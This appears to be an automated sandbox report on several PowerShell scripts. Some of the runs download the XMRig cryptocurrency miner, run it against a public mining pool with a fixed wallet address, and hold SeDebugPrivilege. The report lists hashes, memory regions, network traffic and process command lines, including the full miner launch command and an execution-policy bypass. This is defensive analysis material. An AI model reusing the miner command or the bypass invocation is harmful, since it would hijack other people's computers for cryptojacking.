memory/1396-16-0x0000022F67430000-0x0000022F6743A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4012-47-0x000002434E1D0000-0x000002434E1F0000-memory.dmp

memory/4012-48-0x000002434F940000-0x000002434F960000-memory.dmp

memory/4012-49-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-51-0x000002434F980000-0x000002434F9A0000-memory.dmp

memory/4012-50-0x000002434F960000-0x000002434F980000-memory.dmp

memory/4012-52-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/1396-53-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/1396-54-0x00007FFA6C4E3000-0x00007FFA6C4E5000-memory.dmp

memory/4012-55-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/1396-56-0x00007FFA6C4E0000-0x00007FFA6CFA1000-memory.dmp

memory/4012-59-0x000002434F980000-0x000002434F9A0000-memory.dmp

memory/4012-58-0x000002434F960000-0x000002434F980000-memory.dmp

memory/4012-57-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-60-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-61-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-62-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-63-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-64-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-65-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-66-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-67-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-68-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-69-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-70-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-71-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-72-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-73-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-74-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-75-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-76-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-77-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-78-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-79-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-80-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-81-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-82-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-83-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-84-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-85-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-86-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-87-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-88-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-89-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-90-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-91-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-92-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-93-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-94-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-95-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-96-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-97-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-98-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-99-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-100-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-101-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-102-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-103-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-104-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-105-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-106-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-107-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-108-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-109-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-110-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-111-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-112-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-113-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-114-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-115-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-116-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-117-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

memory/4012-118-0x00007FF69B1B0000-0x00007FF69BDE3000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:56

Platform

win10-20240404-en

Max time kernel

1799s

Max time network

1785s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 92.16.208.104.in-addr.arpa udp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
NL 52.142.223.178:80 tcp
US 8.8.8.8:53 159.113.53.23.in-addr.arpa udp

Files

memory/5008-3-0x00007FFD5A823000-0x00007FFD5A824000-memory.dmp

memory/5008-5-0x000001AF1A250000-0x000001AF1A272000-memory.dmp

memory/5008-8-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-9-0x000001AF1A400000-0x000001AF1A476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_djgysfnp.xsk.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/5008-10-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-25-0x00007FFD5A820000-0x00007FFD5B20C000-memory.dmp

memory/5008-48-0x000001AF1A3E0000-0x000001AF1A3F2000-memory.dmp

memory/5008-61-0x000001AF1A3C0000-0x000001AF1A3CA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:00

Platform

win11-20240508-en

Max time kernel

1653s

Max time network

1663s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_x2ifjlmu.tjm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:03

Platform

win10-20240404-en

Max time kernel

1797s

Max time network

1796s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (12) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.111.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.8.0.8.0.8.0.8.0.ip6.arpa udp
US 8.8.8.8:53 133.111.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.253.116.51.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ggzvjwjv.j3g.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral27

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:15

Platform

win10v2004-20240226-en

Max time kernel

1799s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9) - copia.ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -o gulf.moneroocean.stream:10128 -u 45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=3828 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4088 --field-trial-handle=2292,i,2103142837140538807,15881446839139365070,262144 --variations-seed-version /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.109.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
GB 96.16.110.114:80 tcp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 gulf.moneroocean.stream udp
DE 149.102.143.109:10128 gulf.moneroocean.stream tcp
US 8.8.8.8:53 109.143.102.149.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 13.107.253.64:443 tcp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 164.189.21.2.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 107.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
GB 216.58.204.74:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 74.204.58.216.in-addr.arpa udp
US 8.8.8.8:53 121.150.79.40.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_5pgz2fyk.0yc.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 15:58

Platform

win10v2004-20240508-en

Max time kernel

1790s

Max time network

1799s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (11) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jy0xdoh1.oqr.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral17

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:10

Platform

win10v2004-20240508-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (14) - copia.ps1"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3804,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4024 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=996,i,1809100026287847100,9768898026582633513,262144 --variations-seed-version --mojo-platform-channel-handle=4056 /prefetch:8

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_diw4zaux.zei.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral21

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:11

Platform

win10v2004-20240508-en

Max time kernel

1582s

Max time network

1591s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 github.com udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xndcpwrw.vnd.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Analysis: behavioral24

Detonation Overview

Submitted

2024-05-28 01:50

Reported

2024-06-10 16:14

Platform

win11-20240508-en

Max time kernel

1651s

Max time network

1660s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (15) - copia.ps1"

Signatures

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
